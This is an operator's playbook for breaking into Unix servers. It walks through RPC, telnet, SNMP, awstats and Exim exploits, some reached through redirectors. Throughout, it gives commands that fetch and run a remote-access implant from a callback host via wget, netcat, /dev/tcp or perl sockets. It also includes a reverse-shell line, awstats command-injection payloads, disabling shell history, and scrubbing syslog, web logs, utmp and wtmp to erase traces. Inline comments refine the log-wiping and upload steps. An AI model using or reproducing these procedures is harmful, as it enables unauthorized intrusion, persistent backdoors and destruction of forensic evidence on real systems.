### /server/ftp/log/httpd: referer_log, ssl_request_log, and access_log
#grep -v "-" /server/ftp/log/httpd/referer_log > /tmp/.scsi/c; cat /tmp/.scsi/c
> /server/ftp/log/httpd/referer_log
pwd
-lt /server/ftp/log
-lt /server/ftp/log/httpd
-lt /
df -k
w
ps -auxww
-cd /var/tmp
-get /server/ftp/log/messages
-tail /server/ftp/log/messages
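# one pass over the file: drop the DSADMIN lines and every line mentioning our IP.
# -F takes the patterns literally (with a plain regex the dots in PITCH_IP match any
# character, so unrelated addresses get dropped too). `&&` keeps an unreadable or
# missing log from being clobbered with an empty `m`; `cat m >` preserves the log's
# inode and permissions.
grep -vF -e DSADMIN -e PITCH_IP /server/ftp/log/messages > m && cat m > /server/ftp/log/messages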
-get /server/ftp/log/httpd/referer_log
-tail /server/ftp/log/httpd/referer_log
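# one pass instead of four separate rewrites of the same file (each rewrite bumps the
# mtime again); -F so every pattern is matched literally.
# NOTE: the last pattern (`C`) removes EVERY line containing a capital C, which is far
# more than the exploit traffic. Review `m` (-cat m) before the write-back and tighten
# that pattern to what your requests actually contained.
grep -vF -e prepend -e x90 -e admin -e C /server/ftp/log/httpd/referer_log > m && cat m > /server/ftp/log/httpd/referer_log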
-get /server/ftp/log/httpd/access_log
-tail /server/ftp/log/httpd/access_log
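# -F: match the IP literally (unescaped dots are regex wildcards); `&&` so a failed
# grep (missing/unreadable file) cannot truncate the log with an empty `m`
grep -vF PITCH_IP /server/ftp/log/httpd/access_log > m && cat m > /server/ftp/log/httpd/access_log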
-get /server/ftp/log/httpd/ssl_request_log
-tail /server/ftp/log/httpd/ssl_request_log
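# same as for access_log: literal match on the IP, never write back an empty `m`
grep -vF PITCH_IP /server/ftp/log/httpd/ssl_request_log > m && cat m > /server/ftp/log/httpd/ssl_request_log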
-get /server/ftp/log/httpd/error_log
-tail /server/ftp/log/httpd/error_log
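# both filters in one pass (one rewrite of the file instead of two); -F for literal
# matching, `&&` so a failed grep does not clobber the log with an empty `m`
grep -vF -e PITCH_IP -e db_sql /server/ftp/log/httpd/error_log > m && cat m > /server/ftp/log/httpd/error_log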
-rm m
-rm /tmp/.scsi/sendmail /tmp/.scsi/getopt /tmp/.scsi
-lt
###################################################
### NFTP
###################################################
# nopen ftp
############
ourtn -lue PITCH_IP
noclient PITCH_IP:PORT
-tunnel 12121 udp # NOTE: As of v1.1, if this tunnel is not there, the error message will offer it as a pastable.
# CLEAN UP
/var/log/messages
/var/log/auth
##################################################3
############################################################
# SSH
############################################################
### redirector
-tunnel
l 22 TARGET_IP
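# Multiple targets through the same redirected port? ssh keys its known_hosts entries by
# host[:port], so each new target's key conflicts with the previous one. Rather than wiping
# the whole local file (`cat /dev/null > ~/.ssh/known_hosts` also throws away the keys of
# hosts you actually trust), keep these sessions out of known_hosts altogether:
# (left unquoted on purpose so it splits into separate -o options)
SSHOPTS="-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"
ssh $SSHOPTS -x iga@127.0.0.1 "/bin/sh"
# or
ssh $SSHOPTS -p RANDOM_PORT -x username@127.0.0.1 /bin/sh
# or this eliminates the lack of tty problem
ssh $SSHOPTS -p RANDOM_PORT -x username@127.0.0.1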
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
w
id
uname -a
ls -la /boot
mkdir /tmp/.scsi;cd /tmp/.scsi;pwd
which uudecode uncompress
# gedit sendmail
uudecode; ls -la
# LINUX:
# start nopen so you can upload forkpty to be able to su (ptrace didn't work)
-put forkpty f
./f
# or:
su
############## upload nopen:
###
### using uudecode pastable
###
# if no uuencode and no ftshell (if you used telnet) try:
# locally run:
uudecode.pastable /current/up/morerats/noserver-3.0.3.1-i586.pc.linux.gnu.redha
t-5.0 sendmail
# paste the perl code that it spits out (hit return after the last character), then
# paste the sendmail blob that is brought up in gedit
# you may need to hit Ctrl-C after you see the upload complete
# Note: the upload may not echo to the screen until after the Ctrl-C
###
### using cat & /dev/tcp:
###
# on redir:
-tunnel
r RANDOM
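# netcat (locally, behind the `r RANDOM` tunnel above)
nc -l -v -p RANDOM < sendmail
# on target: /dev/tcp/HOST/PORT only exists as a bash redirection target, not as a real
# file -- `cat /dev/tcp/...` passed as an argument fails with "No such file or directory".
# It must be a redirection, and the shell on the target must be bash.
cat < /dev/tcp/PITCH_IP/RANDOM > sendmail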
###
### using wget:
###
# If none of the above work:
# Locally:
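# Locally: prepend a minimal HTTP response (status line + blank line, CRLF-terminated as
# HTTP expects) so wget on the target accepts the raw binary served by netcat.
printf 'HTTP/1.0 200 OK\r\n\r\n' > new
cat new ../up/morerats/noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > /current/up/sendmail
# serve the file just built -- by full path, since the cat above wrote it to /current/up,
# which is not necessarily the cwd
nc -l -v -p RANDOM < /current/up/sendmail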
# on redir:
-tunnel
r RANDOM
# on target
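# on target -- fetch from the redirector the `r RANDOM` tunnel was opened on (PITCH_IP),
# not from a leftover literal address
wget http://PITCH_IP:RANDOM/sendmail
ls -la
chmod 700 sendmail
# PATH=. must be a prefix assignment on the command; `PATH=./sendmail` only sets PATH
# and runs nothing
PATH=. sendmail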
-nstun TARGET_IP
###
### using secure copy
###
# if that doesn't work, try secure copy:
# on redir:
-tunnel
l RANDOM TARGET_IP 22
###
### Want netcat (nc) but there is none on the target? Use the target's own perl instead:
### using target's perl to open a socket, either
### callback or listen on target.
###
my
:%s/PERLNAME/PERLNAME/g
:%s/PERLRANDOMPORT/PERLRANDOMPORT/g
:%s/PERLCALLBACKIP/PERLCALLBACKIP/g
:%s/PERLCALLFORWARDIP/PERLCALLFORWARDIP/g
:%s,PERLUPLOADFILE,PERLUPLOADFILE,g
`y
#### CALLING out from target
# LOCALLY use netcat to upload file
nc -vv -l -p PERLRANDOMPORT < PERLUPLOADFILE
# or if you want a loop to keep listening after each upload
# keep re-listening so the same file can be served to several callbacks in a row
while :; do
  echo starting listen on PERLRANDOMPORT
  date
  nc -vv -l -p PERLRANDOMPORT < PERLUPLOADFILE
  echo done
  sleep 3
done
# tunnel
-tunnel
r PERLRANDOMPORT
# ON TARGET
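# pull PERLUPLOADFILE from the listener above and write it to PERLNAME; an empty result is removed.
# The old one-liner had `or exit1` (a bareword, not `exit 1`), so a failed connect did not exit
# and fell through to binmode() on an undefined handle. Output handle is closed before the
# size check so everything is flushed to disk first.
perl -MIO -e 'close(STDIN);$c=IO::Socket::INET->new("PERLCALLBACKIP:PERLRANDOMPORT") or exit 1;binmode($c);open(O,">PERLNAME") or exit 1;binmode(O);select O;$|=1;print O while (<$c>);close(STDOUT);close($c);close(O);unlink("PERLNAME") unless (-s "PERLNAME");'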
###
### to elevate using EVENTSTART(?) use whatever name you want
###
-put /current/up/h h
# in your ssh or telnet masquerade window:
./h
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
id
cd /tmp/.scsi;pwd
chmod 700 sendmail
chown root:root /tmp/.scsi
PATH=. sendmail
### in another window
-nstun TARGET_IP 32755
-rm sendmail
##### Don't forget to burn the unprivileged nopen
# Cleanup
/var/log/secure
/var/log/messages
/var/log/lastlog
/var/log/wtmp
/var/run/utmp
###########################################################
# BOSSLAD
###########################################################
### when nsrexec is there but NOT with nsrstatd???
### like a tcp version of BS
### always uses port 7937
### ./bll.tnc.gr
# Before running this script, you first need to run the following:
# nc -l -p localPort < file2Xfer&Run.uu
# (nc must be in your path; it's also run w/in this script)
# where file2Xfer&Run.uu is a compressed, uuencoded file.
# Usage: bll.tnc.gr
# [options] -- [options to <file2Xfer&Run>]
# -i <target ip> (required)
# -l <callback ip> (required)
# -p <callback port> def = 32177
# -f <file2Xfer&Run> (required)
# -D <remoteDir> def= /tmp/.X11R6
#
# ./bll.tnc.gr -i 66.128.32.67 -l 67.233.61.230 -p 24792 -f sendmail -D /tmp/.sc
si
packrat NETCAT_PORT
### On redirector:
-tunnel
l 7937 TARGET_IP
r NETCAT_PORT
### On local machine:
### Ex.: ./bll.tnc.gr -i 127.0.0.1 -l 150.27.1.11 -p 45226 -f sendmail -D /tmp/
.scsi
./bll.tnc.gr -i 127.0.0.1 -l PITCH_IP -p NETCAT_PORT -f RAT_NAME -D /tmp/WORK_DI
R
### Once upload of RAT completes, connect to target from PI with nopen:
-nstun TARGET_IP
### Cleanup
-ls /nsr/cores
-ls /nsr/cores/sh
-cat /nsr/cores/sh/*
rm /nsr/cores/sh/*
-rm /nsr/cores/sh
-touch SOMEFILE /nsr/cores
-ls /nsr/logs
-ls /nsr/logs/daemon.log
-get /nsr/logs/daemon.log
wc -l /nsr/logs/daemon.log
head -## /nsr/logs/daemon.log > n
-cat n
cat n > /nsr/logs/daemon.log
touch SOMEFILE /nsr/logs/daemon.log
#########################################################
# ELVISCICADA
#########################################################
### only up to early Sol 2.9; Sol 2.10 is not vulnerable
### snmpXdmid (/usr/lib/dmi/dmispd) daemon program (RPC program 300598 version 1
)
# Req:
# 1. you must know the OS
# 2. you must be able to connect with TCP (for when you get the root shell)
# 3. /usr/lib/dmi/dmispd must be running on the target system,
# and you must be able to successfully talk to its ___UDP___ port.
# This is usually evidenced by RPC program 300598 version 1
# during rpcinfo -p and UDP rpcinfo -n "touches" of the target, such as...
#
# $ rpcinfo -p target
# ...
# 300598 1 udp 32879
# 300598 1 tcp 32796
# ...
# $ rpcinfo -n 32879 -u target 300598
# program 300598 version 1 ready and waiting
# $
#
# if rpcinfo -n returns "ready and waiting", ELVISCICADA should be ready to sing.
### -scan brpc TARGET_IP
### look for program 300598 version 1 of dmispd and make note of UDP port
### test that TCP connects get thru to the default shellcode port (32387)
### (being refused is still good - it means the packet got thru)
### If the port doesn't answer, pick another port that works, AND add the "-s" option
### using the new (random) port
# ON PI:
-tunnel
l 32387 TARGET_IP
# Locally
telnet 127.0.0.1 32387
### Usage:
./dw.linux
### Use the lowest number for the target OS and increment by one on each subsequent attempt:
./dw.linux -t <VALUE> -i TARGET_IP -s RANDOMSHELLPORT -p UDPPROGRAMPORT
./dw.linux -t <VALUE> -i TARGET_IP -p UDPPROGRAMPORT
### If redirected:
# On PITCHIMPAIR
-tunnel
l RANDOMSHELLPORT TARGET_IP
u PROGRAMPORT TARGET_IP
r NETCATPORT
# Locally:
./dw.linux -t <VALUE> -i 127.0.0.1 -s RANDOMSHELLPORT -p UDPPROGRAMPORT -w 10 -b
1024
./dw.linux -t <VALUE> -i 127.0.0.1 -p UDPPROGRAMPORT
### Cleanup:
# possible core file in /? or /usr/lib/dmi/dmispd?
-ls /core /usr/lib/dmi/dmispd
#/var/adm/messages (for failures)
-tail /var/adm/messages
#########################################################
# EMPTYCRISS
#########################################################
### No redirection:
### This will create the output to paste into the telnet window:
### local unscripted window:
./emptycriss TARGET_IP
# or
perl ./emptycriss TARGET_IP
### op window
### paste instructions from 1st window into this one
### Ex.:
#ATTACKER# telnet
#
#ATTACKER# telnet> environ define TTYPROMPT abcdef
#
#ATTACKER# telnet> o victimip
#
#ATTACKER# telnet> root c c c c c c c c c c c c c c
#c c c c c c c c c c c c c c c c c c c c c c c c c c
#c c c c c c c c c c c c c c c c c c c c c c c c\n
##
##id
##uid=0(root) gid=1(other)
##uname -a
### if it fails, try again as /bin
ftshell telnet
### Redirected:
-tunnel
l RANDOM TARGET_IP 23
#
# In unscripted window
#
./emptycriss 127.0.0.1
# In scripted op window:
ftshell telnet
### NOTE: be sure to open 127.0.0.1 on the RANDOM redirected port
#Ex:
#o 127.0.0.1 RANDOM
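unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
# stop here if the work dir cannot be created or entered (an existing dir owned by
# someone else would otherwise leave the rat sitting in /tmp itself); 700 keeps
# other users out of it
mkdir WORK_DIR && chmod 700 WORK_DIR && cd /tmp/WORK_DIR
pwd
~~p
noserver sendmail
ls -la
chmod 700 sendmail
# only start the listener if nothing already owns RAT_PORT
netstat -an | grep "RAT_PORT.*LISTEN" || PATH=. D="-l RAT_PORT" sendmail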
##########################################
# EASYSTREET
##########################################
### cmsd 100068
### UDP is best since it's a single packet to exploit
-scan rpc TARGET_IP # look for 100068 and make note of port
### UDP is best since it's a single packet to exploit
### with -sploit:
#-sploit will ask you which exploit to try.
# Select 'CM' (calendar manager)
# Another window will pop up to run the exploit
# This window will pause to allow you to verify the command it will run.
# The command should look something like this (the ports will vary):
# -u 32778 -i 127.0.0.1 -l 192.168.250.3 -r sendmail -D /tmp/.scsi -n 26120
-c
# Append '-T 2' to the front of the line so that it looks like this:
# -T 2 -u 32778 -i 127.0.0.1 -l 192.168.250.3 -r sendmail -D /tmp/.scsi -n
26120 -c
# Then press return.
# The exploit window will prompt you to set up a listener like this:
# You must establish a NOPEN listener on 192.168.250.3:SOME_RANDOM_PORT
-nrtun RANDOM (as indicated in the -sploit exploit prompt)
#Press enter
#Now the exploit will occur and, after a couple of minutes, it will call back
#to your listener.
#Once the callback occurs, take the following steps:
#In a local window
LOCAL>closetunnel
#Press 'A' to abort the autodone commands
#Delete the files created by your exploit
#There should be one lock file and one callog file
-lt /var/spool/calendar
-rm /var/spool/calendar/THE_TWO_MOST_RECENT_FILES
#Use touch to set the directory timestamp back
-lt /var/spool
-touch /var/spool/SOME_OLDER_DIRECTORY /var/spool/calendar
### Usage:
./cmsex
./cmsex.auto
### no redirection
./cmsex -i TARGET_IP -c 'mkdir /tmp/.scsi; cd /tmp/.scsi && telnet LOCAL_IP NETC
AT_PORT | uudecode && uncompress sendmail.Z && PATH=. sendmail' -T <target_type>
(-u RANDOM | -t RANDOM)
### Redirected:
-tunnel
u RANDOM TARGET_IP CMSD_PORT
r NETCAT_PORT
### when the upload is done, kill the netcat, then try connecting in
-nstun TARGET_IP
-rm sendmail
### Logging:
-lt /var/adm
-lt /var/spool/calendar
#########################################################
# EBB
#########################################################
### Sol2.10 vulnerable for only program 100230 metamhd using ebbshave.v4
### ./ebbshave.v5 is a wrapper program for the ebbnew_linux exploit for Sparc Solaris RPC services
### Important: ebbnew_linux must be in your PATH
### Useful command to confirm a program/port pair answers before throwing:
rpcinfo -n <PORT NUM> -u|-t <TARGET_IP> <PROGRAM NUM>
usage: ./ebbshave.v5 -o -v -t -p
-o : one of the following options [1-19]:
1, "5.9 metamhd", program # = 100230,
2, "5.8 ruserd", program # = 100002, NOTE = version 1
3, "5.8 ruserd", program # = 100002, NOTE = version 2 - must start servi
ce first by using rpcinfo -n before using this option
4, "5.8 ttdbserverd", program # = 100083,
5, "5.8 cachefsd", program # = 100235, NOTE = version 1 - Start with opt
ion #6 first, if it fails then try this option
6, "5.8 cachefsd", program # = 100235, NOTE = version 2 - must start ser
vice first by using rpcinfo -n before using this option
7, "5.8 metad", program # = 100229, NOTE = version 1
8, "5.8 metad", program # = 100229, NOTE = version 2 - must start servic
e first by using rpcinfo -n before using this option
9, "5.8 metamhd", program # = 100230,
10, "5.7 ruserd", program # = 100002, NOTE = must start service first by
using rpcinfo -n before using this option
11, "5.7 kcms_server", program # = 100221,
12, "5.7 cachefsd", program # = 100235,
13, "5.7 ttdbserverd", program # = 100083,
14, "5,7 dr_daemon", program # = 300326,
15, "5.6 ruserd", program # = 100002,
16, "5.6 kcms_server", program # = 100221,
17, "5.6 cachefsd", program # = 100235, NOTE = version 1 - Start with op
tion #18 first, if it fails then try this option
18, "5.6 cachefsd", program # = 100235, NOTE = version 2 - must start se
rvice first by using rpcinfo -n before using this option
19, "5.6 ttdbserverd", program # = 100083,
-v : the program version number you are exploiting which is obtained from rpcinf
o output
-t : targets ip address
-p : port number rpc program is listening on
example:
./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772
If you fail to exploit using ./ebbshave.v5, try bruteforcing using ebbshave.v4
### 1. Use the following command to look for a suitable program to hit
### Redirection:
-tunnel
l 111 TARGET_IP
### Local box:
./ebbshave.v5
ebbshave -p 127.0.0.1
### 2. Verify the portnum will work (should respond "ready and waiting)
### Use either:
# rpcinfo -n <PORT NUM> -u|-t <TARGET_IP> <PROGRAM NUM>
# Ex.: ebbshave -n 32776 -t targetip 100229
### Redirector:
-tunnel
l PORTNUM TARGET_IP
### Locally, see if the program you want is a viable option:
./ebbshave -n portnum -t host prognum
./ebbshave -n PORTNUM -t 127.0.0.1 PROGNUM
### Use this for usage statement
./ebbshave
### If that doesn't work, try without the best guess (B) option, or maybe increase the
### timeout period (W)
ebbshave -T OPTION -n PORTNUM -t 127.0.0.1 PROGNUM
###### Cleanup:
/usr/openwin/bin/core
/var/adm/messages
# Other core-file locations?
# Always look at utmp, wtmp, etc.
#########################################################
# BS - BLUE
#########################################################
# ../bin/bs.tr -h
#
# Usage:
# [E=ratpreargs] [A=ratpostargs] bs.tr remoteIP remoteHost \
# [remoteDomain] \
# sadmindPort remoteDir remoteName localIP localPort
#
# ratpreargs : the string put on remote command line right after PATH=. a
nd
# before remoteName (e.g. E='C="-c LOCALIP port"' or
# E='C="-l listenport"')
#
# ratpostargs : the string put on remote command line after running remote
Name
#
#
# Command sent to bs will be munged from:
#
#CMD="mkdir -p ${REMOTE_DIR} && cd ${REMOTE_DIR} && telnet ${LOCAL_IP} ${LOCAL_P
ORT} < /
#dev/console | uudecode > /dev/null 2>&1 && uncompress -f ${REMOTE_FNAME}.Z && c
hmod 755
# ${REMOTE_FNAME} && PATH=.${RAT_PREARGS} ${REMOTE_FNAME}${RAT_POSTARGS}"
### TRICK - use -A option to get its archtype back
### TRICK - give a bad hostname to see if it's running in secure mode; if it complains, then
###         it's still vulnerable, and work out the other options; if there's no response
###         try another bad name; if there's still no response, then it's running in
###         secure mode and is not vulnerable
### Scan target
#rpcinfo -p TARGET_IP
#
#rpcinfo -n BSPORT -u TARGET_IP 100232
#rpcinfo -n BSPORT -t TARGET_IP 100232
-scan rpc TARGET_IP
mx
:%s/SADMIND_PORT/SADMIND_PORT/g
:%s/REMOTE_DIR/\/tmp\/WORK_DIR/g
`x
###### Start netcat
packrat NETCAT_PORT
### Redirection:
### E='D="-l RAT-PORT"' ./bs.tr 127.0.0.1 TARGET-NAME TARGET-DOMAIN SADMIND-PORT
REMOTE-DIR RAT-NAME PITCH-IP NETCAT-PORT
### No domainname:
E='D="-l RAT-PORT"' ./bs.tr 127.0.0.1 TARGET_NAME SADMIND_PORT REMOTE_DIR RAT_NA
ME PITCH_IP NETCAT_PORT
### With domainname:
E='D="-l RAT_PORT"' ./bs.tr 127.0.0.1 TARGET_NAME TARGET_DOMAIN SADMIND_PORT REM
OTE_DIR RAT_NAME PITCH_IP NETCAT_PORT
### Callback:
E='D="-c PITCH_IP RAT_PORT"' ./bs.tr 127.0.0.1 TARGET_NAME SADMIND_PORT REMOTE_D
IR RAT_NAME PITCH_IP NETCAT_PORT
###### 3. Waiting:
# you will see bursty traffic on your tcpdump, first the trigger, then the conne
ction to upload nopen.
# Hit Ctrl-C on your nc
###### Cleanup:
# usually nothing
###########################################################
# GS - GREEN
###########################################################
gs.auto
Usage: $PROG -i <rem_ip> [ options ]
-i IP IP of target machine (NO DEFAULT)
-g opt Change default GS option from ./$GS_OPTION to \"./opt\"
(can be grins, frowns or sneer).
-C str Change default community string from public to \"str\".
-l IP IP of attack machine (Default: the first active IP found in
this order: ppp0, ppp1, eth0 or eth1)
-n # rat upload port (Default: a random port)
-p # Use port # for RAT listen/callback. (Default: random)
-s # Change delay used for -c to # seconds (must appear before -c).
-c Use NOPEN syntax to have RAT callback after a delay (Default
delay: $CALLBACKDELAY seconds). Callback is to -l IP.
-k Use ksh method instead of telnet/uu*code.
-z Do NOT use uncompress at either end
-r rat name of rat on target (Default: sendmail)
-D dir directory to work from/create on target (Default = /tmp/.scsi)
-P Assume PATH=. will fail so use ./ratname
target, and MUST NOT use uuencode on upload.
-a ARCH String used to determine which architecture NOPEN server to
upload from /current/up/morerats/ using this (note tail -1):
\"ls -1 ./noserver* 2>/dev/null | grep -i ${ARCH} | tail -1\".
If not provided or no match, /current/up/noserver is assumed.
-G Retry exploit--using already uploaded RAT (useful when you need
to try adding -P option or try another RAT callback port).
# Tunneling
# on redirector
-tunnel
u 161 TARGET_IP
r NETCAT_PORT
s
# logging depends on sneer(2.6) or frowns(2.7+)
# With redirector:
#./gs.os.gr -i 127.0.0.1 -g <frowns/sneer> -l PITCH-IP -n NETCAT-PORT -D /tmp/WO
RK-DIR -f RAT-NAME
./gs.os.gr -i 127.0.0.1 -g <frowns/sneer> -l PITCH_IP -n NETCAT_PORT -D /tmp/WOR
K_DIR -f RAT_NAME
# NO tunneling
# Local window
#./gs.os.gr -i TARGET-IP -g <frowns/sneer> -l LOCAL-IP -n NETCAT-PORT -D /tmp/WO
RK-DIR -f RAT-NAME
./gs.os.gr -i TARGET_IP -g <frowns/sneer> -l LOCAL_IP -n NETCAT_PORT -D /tmp/WOR
K_DIR -f RAT_NAME
# Both cases:
#you wait 4 minutes, and you should see the upload of nopen
# Ctrl-C your nc
### Connect to target:
### Straight connect (no redirection)
cd ../down
../bin/noclient TARGET_IP
### Connect using redirector:
-nstun TARGET_IP
### Cleanup:
### run cleaner after frowns (or else another callback in 4 minutes) (might be automatic now)
### rm /tmp/mibiisa_ps_data
### toast utmp, wtmp, utmpx, wtmpx
###############################################
# YS - YELLOW
##############################################
### New way:
Usage: ys.auto -i TARGETIP [options]
-i IP IP of target machine (NO DEFAULT)
-l IP IP of attack machine (Default: the first active IP found in
this order: ppp0, ppp1, eth0 or eth1)
-n # rat upload port (Default: a random port)
-p # Use port # for RAT listen/callback. (Default: random)
-s # Change delay used for -c to # seconds (must appear before -c).
-c Use NOPEN syntax to have RAT callback after a delay (Default
delay: 3 seconds)
-z Do NOT use uncompress at either end
-e Do NOT use "2>&1" on target. Fouls up in some shells.
-r rat name of rat on target (Default: sendmail)
-x # port to start mini X server on (Default: random port)
-D dir directory to work from/create on target (Default = /tmp/.scsi)
-P Assume PATH=. will fail so use ./ratname
target, and MUST NOT use uuencode on upload.
-a ARCH String used to determine which architecture NOPEN server to
upload from /current/up/morerats/ using this (note tail -1):
"ls -1 ./noserver* 2>/dev/null | grep -i ${ARCH} | tail -1".
If not provided or no match, /current/up/noserver is assumed.
NOTE: -x # and -p # can be the same, even in callback mode. ys.auto provides
a mechanism to allow the netcat callback to finish, and its -tunnel to
close, before the NOPEN server calls back on the same port.
examples:
ys.auto -l 19.16.1.1 -i 10.0.3.1 -n 2222 -r nscd -x 9999 -D /tmp/.dir
ys.auto -i 10.0.3.1
ys.auto -i TARGET_IP -l REDIRECTOR_IP
NOTE: The only REQUIRED ARGUMENT is now -i
The best way to back out of ys.auto once done (whether or not you get on
target) is to kill off the packrat window first with ^C then ^D. Then
kill of the xc window the same way, finally kill the ys.auto.
ys.auto Version 1.4.1.1
### Old Way:
mx
:%s/XSERVER_PORT/x/g
x
-scan xwin TARGET_IP
### Locally:
packrat NETCAT_PORT
#or
packrat -n /current/bin/nc.YS NETCAT_PORT
######### YS With no redirection:
### Local Window 1:
#./wrap-sun.sh -l LOCAL-IP -r sendmail -p NETCAT-PORT -x XSERVER-PORT -d /tmp/WO
RK-DIR
./wrap-sun.sh -l LOCAL_IP -r sendmail -p NETCAT_PORT -x XSERVER_PORT -d /tmp/WOR
K_DIR
### Local Window 2:
#./xc -x LOCAL-IP -y XSERVER-PORT -s LOCAL-IP TARGET-IP
./xc -x LOCAL_IP -y XSERVER_PORT -s LOCAL_IP TARGET_IP
# Ex:
#/current/bin/catflap_sparc -7 -c "/bin/sh"
/current/bin/catflap_sparc -<option_num> -c "/bin/sh"
### on redirector
-rtun NETCAT_PORT
### Local window
ftshell telnet localhost 2323
### paste catflap output once you get telnet prompt
<ctrl><d>
### should get root prompt
### Now upload rat
### with ftshell:
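unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
# stop here if the work dir cannot be created or entered (an existing dir owned by
# someone else would otherwise leave the rat sitting in /tmp itself); 700 keeps
# other users out of it
mkdir WORK_DIR && chmod 700 WORK_DIR && cd /tmp/WORK_DIR
pwd
~~p
noserver sendmail
ls -la
chmod 700 sendmail
# only start the listener if nothing already owns RAT_PORT
netstat -an | grep "RAT_PORT.*LISTEN" || PATH=. D="-l RAT_PORT" sendmail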
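### now root on target (do the following if you did NOT use ftshell)
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
# do not continue into /tmp itself if the work dir could not be created/entered
mkdir WORK_DIR && chmod 700 WORK_DIR && cd /tmp/WORK_DIR
pwd
telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode;ls -la
uncompress sendmail.Z
# the netstat check is only worth something if you act on it: skip the listener
# when RAT_PORT is already taken instead of starting a server that cannot bind
netstat -an | grep "RAT_PORT.*LISTEN" || D="-l RAT_PORT" PATH=. sendmail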
### pitch window
-nstun TARGET_IP RAT_PORT
### <ctrl><c> or <ctrl><d> in root target window/nc once
### you have nopen on target
-put /current/up/toast t
-ls -t /var/adm /var/log
### look at entries
./t -u /var/adm/utmp
./t -u /var/adm/wtmp | tail -20
./t -x /var/adm/utmpx
./t -x /var/adm/wtmpx | tail -20
############################################
# EXPOSITTRAG
############################################
# exploit pcnfsd version 2.x (fails on v.1 or 3+)
#
# whatever redirector you use, port 514 must not already be in use there (check first):
netstat -an | grep 514
# to determine the version
-scan rpc TARGET_IP
-tunnel
u UDP_PCNFSD_PORT TARGET_IP
# LOCAL
#./prout -w TARGET_IP UDP_PCNFSD_PORT
./prout -w 127.0.0.1 791
Profiles:
[0] Gentle Persuasion
[1] Redhat 9
./electricslide -t 1 -l LOCAL_IPorPITCH_IP TARGET_IPor127.0.0.1
###################### ELMIRASIGNET #####################
# vulnerability in awstats software < 6.3 on apache server
# jogswirl
-tunnel
l 80 TARGET_IP
r 5555
# vulnerable ?
-scan http TARGET_IP
# galeon http://127.0.0.1/cgi-bin/awstats.pl
Advanced Web Statistics 6.1 (build 1.704)
# ./xp_awstats.pl -i 127.0.0.1 -d /cgi-bin/awstats.pl -e 0 -c "uname -a;ls
-la;w"
./xp_awstats.pl -i<host> -d<dir/file> -e<exploit method number> -c<commands to r
un on target>
-i <127.0.0.1>
-d </cgi-bin/awstats.pl>
-p <port>
-e <exploit method>
0: ?pluginmode=:system("CMD");
1: ?configdir=|CMD|
2: ?update=1&logfile=|CMD|&framename=mainright
-c <Command to run on target>
Examples:
1) ./xp_awstats.pl -i http://127.0.0.1/cgi-bin/awstats.pl -e3 -c"uname -a;ls -la
;w"
2) ./xp_awstats.pl -i http://127.0.0.1/cgi-bin/awstats.pl -e3 -c"(mkdir /tmp/.sc
si; cd /tmp/.scsi; /usr/bin/wget http://
PITCH_IP:5555/sendmail -Osendmail;chmod +x sendmail;D=-cPITCH_IP:9999 PATH=. sen
dmail) 2>/dev/null"
-nstun TARGET_IP:9999
###################### ERRGENTLE ##########################
# exploits a vulnerability in the Exim 3.22 through 3.35 Mail Transfer Agent
# brute force
###### Version 3
# Upload on PITCHIMPAIR and run
netstat -an | grep LISTEN | grep 113
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/bin/xp-exim-3-remote-solaris-v3 x
-shell
./x -i TARGET_IP -p 25 -d SCAPEGOAT_DOMAIN -u nobody -t
# states if vulnerable; hit return to throw if vulnerable
# takes about 1000 hits; scrolls fast; will get root prompt
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
id
pwd
# will put you in /usr/exim-3.33/spool
PATH=. crond
<ctrl><d>
exit
-rm /tmp/.scsi/x /tmp/.scsi
###### Version 2
-tunnel
l 25 TARGET_IP
r 113
r RANDOM_PORT
# test susceptibility:
-scan mail TARGET_IP
./xp-exim-3-v3 -i 555.1.2.150 -p 25 -t -d a.jetson.net -u nobody
./xp-exim-3 -i 127.0.0.1 -p 25 -c "sh </dev/tcp/PITCH_IP/RANDOM_PORT >&0 2>&0" -
t
# response should be something like:
# It's vulnerable! Hit a key to start
################################################
### VS - VIOLET
### You need to do this exploit from a box very close (ideally on the same net)
### as the target because of the traffic it generates.
### Reference the README file in /current/bin for help on the new version
################################################
#Start Xserver on local ops machine prior to logging in
### VS version5
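# grant X access to the one host that will connect back (TARGET_IP when not
# redirecting) and revoke it afterwards with `xhost -<IP>`; never a bare `xhost +`,
# which turns X access control off for everyone
xhost +PITCH_IP
# admit only the X callback instead of flushing the whole local firewall (iptables -F)
iptables -I INPUT -s PITCH_IP -p tcp --dport 6000 -j ACCEPT
# make sure the local X server is listening
netstat -an | grep 6000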
### run the test version first to get the times (if vulnerable):
-put /current/bin/vs.gettime.sol.sparc v
rpcinfo -p TARGET_IP
#Ex: ./v -i 202.83.160.51 -h ATMNMS -n 34647 -p 443
./v -i TARGET_IP -h HOSTNAME -n TCP_PROGRAMPORT -p CALLBACK_PORT
### hit return when prompted; once you get the times for the cookie
### you can throw the attack thru the redirector
-rm v
-cd /tmp
-rm .scsi
### set up the tunnels, using whichever ports you think can call back:
-tunnel
l TCP_PROGRAMPORT TARGET_IP
r 8080 127.0.0.1 6000
r 443
###old way:
#Misc ex:
./vs.linux -i 555.1.2.79 -h blade1000 -D -q 554.208.30.2 -p 6000 -v 5 -r 128963
7086 -n 52213
mkdir /tmp/.scsi; cd /tmp/.scsi; telnet local_ip port </dev/console |uudecode; l
s -al
uncompress sendmail.Z; chmod +x sendmail; PATH=. sendmail
###################################################3
### TTSESSION (rpcttjamsession)
###################################################3
### pops a terminal back to your box
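### make sure Xserver is running locally (may need to restart box):
netstat -an | grep 6000
### Allow the target's window onto your local display -- for that host only.
### A bare `xhost +` disables X access control for everyone; revoke with `xhost -PITCH_IP` when done.
xhost +PITCH_IP
### and maybe, rather than flushing the whole local firewall (iptables -F), just admit
### the X callback that arrives through the redirector:
iptables -I INPUT -s PITCH_IP -p tcp --dport 6000 -j ACCEPT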
### see if you'll need to elevate, see who is running that session:
### superuser is golden
-scan brpc TARGET_IP
mx
:%s/RANDOM_PORT/RANDOM1/g
